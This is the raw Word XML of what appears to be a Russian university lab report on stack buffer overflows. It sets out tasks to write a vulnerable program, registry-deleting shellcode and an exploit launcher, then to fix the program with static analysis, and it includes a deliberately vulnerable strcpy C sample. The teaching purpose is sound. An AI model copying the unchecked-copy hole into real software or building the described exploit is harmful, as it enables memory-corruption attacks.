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0A5C05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576774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>омпьютерных наук и кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA3754" w14:textId="7518F916" w:rsidR="00187ED6" w:rsidRPr="00B57B60" w:rsidRDefault="00187ED6" w:rsidP="006829C1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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4A399C" w14:textId="3D11B052" w:rsidR="00830F2D" w:rsidRDefault="00FB359E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D001AA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000068B8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6FEB2" w14:textId="77777777" w:rsidR="0096511A" w:rsidRDefault="0096511A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0D670D0A" w14:textId="22CF98CE" w:rsidR="0096511A" w:rsidRPr="000068B8" w:rsidRDefault="0096511A" w:rsidP="000068B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0068B8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Изучение программных уязвимостей типа </w:t>
      </w:r>
      <w:r w:rsidR="000068B8" w:rsidRPr="000068B8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>«Переполнение буфера»</w:t>
      </w:r>
      <w:r w:rsidRPr="000068B8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="50D819EA" w14:textId="77777777" w:rsidR="0096511A" w:rsidRDefault="0096511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FF0E33D" w14:textId="77777777" w:rsidR="00D001AA" w:rsidRPr="00D001AA" w:rsidRDefault="00D001A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D9118F2" w14:textId="3308D041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264C8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4A6F00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001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219CAA1" w14:textId="4994EAC3" w:rsidR="00C53ADA" w:rsidRPr="00B57B60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</w:t>
      </w:r>
      <w:r w:rsidR="00D001AA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="00D001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5151003</w:t>
      </w:r>
      <w:r w:rsidR="00D001AA" w:rsidRPr="00D001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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576774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B17EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Библив А.И.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F5402" w14:textId="76FBB7E9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proofErr w:type="gramStart"/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001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D001AA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r w:rsidR="002B17EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B264C8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Михайлич М. И.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FAA36C" w14:textId="3D4E5A53" w:rsidR="00D001AA" w:rsidRPr="00D001AA" w:rsidRDefault="00D001AA" w:rsidP="0027419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9C6C28A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3C8BF6CC" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00B264C8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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B17EE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Орел</w:t>
      </w:r>
      <w:r w:rsidR="00576774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Е</w:t>
      </w:r>
      <w:r w:rsidR="00576774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>М</w:t>
      </w:r>
      <w:r w:rsidR="00576774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0E2E3" w14:textId="714253F7" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00B264C8" w:rsidP="00576774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27419F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3CD90E" w14:textId="77B297D4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400442">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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9BB1614" w14:textId="1C07DF50" w:rsidR="0096511A" w:rsidRPr="0096511A" w:rsidRDefault="00D001A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B264C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B00FE" w14:textId="52FBA4EC" w:rsidR="00241362" w:rsidRDefault="00C93DCC" w:rsidP="00B264C8">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r w:rsidRPr="0096511A">
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE68572" w14:textId="5DF51C1E" w:rsidR="000068B8" w:rsidRPr="000068B8" w:rsidRDefault="000068B8" w:rsidP="000068B8">
      <w:r>
        <w:t>Приобрести навыки по прикладному анализу программных уязвимостей типа «переполнение буфера» и по предотвращению и эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A225F" w14:textId="39FDCBEF" w:rsidR="004E171E" w:rsidRDefault="004E171E" w:rsidP="004E171E">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:t>Постановка задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22549BF5" w14:textId="468C4E49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Разработать уязвимую к «переполнению буфера» программу, которая принимает в качестве аргумента строку и копирует ее в буфер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD4053" w14:textId="0D6DA01B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Создать шелл-код, который удаляет значение заданного ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2A68CB" w14:textId="6C90003A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Разработать программу, которая по известному размеру буфера уязвимой программы компонует адрес возврата и шелл-код (с возможностью выбора удаляемого ключа системного реестра) и затем запускает уязвимую программу, передавая в качестве аргумента сгенерированную входную строку, которая вызывает переполнение буфера и удаление заданного ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32833353" w14:textId="0C8A06B1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Запустить разработанную программу и убедиться в удалении ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F542C1" w14:textId="2C0CFC8A" w:rsidR="000068B8" w:rsidRP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 xml:space="preserve">Установить утилиту статического анализа исходных кодов, например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPPcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, поддерживающий языки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="000068B8">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="000068B8">
        <w:t>++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECADE99" w14:textId="6A142494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Проверить с помощью утилиты статического анализа исходных кодов программу, разработанную в п. 3. Зафиксировать результаты анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8321D" w14:textId="222AA725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Используя полученный в п. 6 отчет утилиты анализа, устранить ошибки в исходном коде разработанной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1025CA09" w14:textId="1A74088D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Повторить выполнение п. 6 и убедиться в исправлении ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D49AB6" w14:textId="6B6B68F6" w:rsidR="000068B8" w:rsidRDefault="000068B8" w:rsidP="000068B8">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Запустить модифицированную программу и убедиться в том, что шелл-код не срабатывает и ключ системного реестра не удаляется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAD917" w14:textId="0F37881D" w:rsidR="004541B3" w:rsidRDefault="00C93DCC" w:rsidP="000068B8">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Теоретические исследования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D38ED82" w14:textId="07F01E7D" w:rsidR="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Переполнение буфера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve"> одна из наиболее распространенных </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172EF7C" w14:textId="5A467D11" w:rsidR="000068B8" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00410A64">
        <w:t>уязвимостей программного обеспечения, возникающих из-за отсутствия контроля границ массивов со стороны компилятора и операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8D819" w14:textId="48C94811" w:rsidR="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t>Память в программе адресуется относительно точки входа в программу. Память сегментирована и состоит из сегмента кода, сегмента данных и сегмента стека. Сегмент кода содержит инструкции, исполняемые процессором, где адрес следующей выполняемой инструкции указан в регистре ЕР. Сегмент данных содержит данные, используемые командами программы. В сегменте стека хранятся переменные функций, переменные окружения и аргументы, которые передаются программе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A42462" w14:textId="695CF6A8" w:rsidR="00410A64" w:rsidRPr="00D05CCE" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve">Стек — структура данных, в которой последний помещенный в стек объект извлекается из него первым (принцип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LIFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">«последним пришел-первым вышел»). </w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve">Для доступа к сегменту стека используется указатель стека — регистр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve">, содержащий адрес вершины (наименьший адрес) стека. В архитектуре </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intel</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve"> стек </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t>растет</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:t xml:space="preserve"> вниз, то есть используются адреса памяти в сторону уменьшения номеров адресов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D060416" w14:textId="6AE6876B" w:rsidR="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>В большинстве языков программирования стек используется при передаче</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AE6BB" w14:textId="63E1EB20" w:rsidR="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">данных в вызываемую процедуру. При вызове процедуры (с помощью инструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) в стек помещается текущее значение регистра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а по окончании работы процедуры (с помощью инструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RET</w:t>
      </w:r>
      <w:r>
        <w:t>) это значение восстанавливается, и процессор продолжает работу с того места, где он остановился перед вызовом процедуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A4084" w14:textId="0406BE34" w:rsidR="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Функция – это часть кода программы, которая вызывается, выполняется и затем возвращается к предыдущему процессу исполнения. Если функция содержит аргументы, то под них в стеке выделяется память. Например</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05CCE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05CCE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>коде</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAAC95" w14:textId="23E0376B" w:rsidR="00410A64" w:rsidRPr="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A6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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D8931" w14:textId="2C003E60" w:rsidR="00410A64" w:rsidRPr="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A6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>int sample_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overflow(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int argc, char *</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argv[]){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7978E8D5" w14:textId="025BBDC5" w:rsidR="00410A64" w:rsidRPr="00D05CCE" w:rsidRDefault="00410A64" w:rsidP="00410A6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ab/>
        <w:t xml:space="preserve">char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500]; //</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>переменная</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326EBCB" w14:textId="467B46F3" w:rsidR="00410A64" w:rsidRPr="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A6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ab/>
        <w:t>if(argc&gt;1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E6B83" w14:textId="4CECDEE5" w:rsidR="00410A64" w:rsidRPr="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A6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ab/>
      </w:r>
      <w:r w:rsidRPr="00410A64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410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">buf, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1]); // </w:t>
      </w:r>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>уязвимая</w:t>
      </w:r>
      <w:r w:rsidRPr="00410A6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0A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>функция</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D371E" w14:textId="7EF530E9" w:rsidR="00410A64" w:rsidRPr="007949C2" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410A64">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007949C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949C2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1D6BEFC0" w14:textId="50D96121" w:rsidR="00410A64" w:rsidRDefault="00410A64" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05CCE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26644001" w14:textId="7F41CAD6" w:rsidR="009B3321" w:rsidRDefault="00221913" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">под </w:t>
      </w:r>
      <w:r w:rsidR="00165B6D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">переменную </w:t>
      </w:r>
      <w:r w:rsidR="00165B6D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidR="00165B6D" w:rsidRPr="00165B6D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00165B6D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>в стеке выделяется 500 б</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">айт (стек при нормальном выполнении программы представлен </w:t>
      </w:r>
      <w:r w:rsidR="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>табл.</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1). Уязвимость типа «переполнение </w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">буфера» заключается в том, что аргумент, передаваемый функции и копируемый в </w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, может быть больше 500 байт. В этом случае, по причине отсутствия механизмов проверки, данные, содержащиеся в аргументе, переполняют буфер и затирают данные в стеке, которые следуют за буфером (</w:t>
      </w:r>
      <w:r w:rsidR="009513BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>табл</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. 2). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EA1E3" w14:textId="011624FB" w:rsidR="00D05CCE" w:rsidRDefault="009513BB" w:rsidP="00995877">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>табл</w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. 2 данные из </w:t>
      </w:r>
      <w:r w:rsidR="00D05CCE" w:rsidRPr="00D05CCE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>буфера перекрывают адрес возврата из функции. Таким образом, злоумышленник может составить определенный код, при котором на месте адреса возврата в стеке окажется новый адрес, указывающий на инструкции созданного им шелл-кода, управление на который передается в результате переполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0AB86" w14:textId="77777777" w:rsidR="009513BB" w:rsidRDefault="009513BB" w:rsidP="00410A64">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1281" w:type="dxa"/>
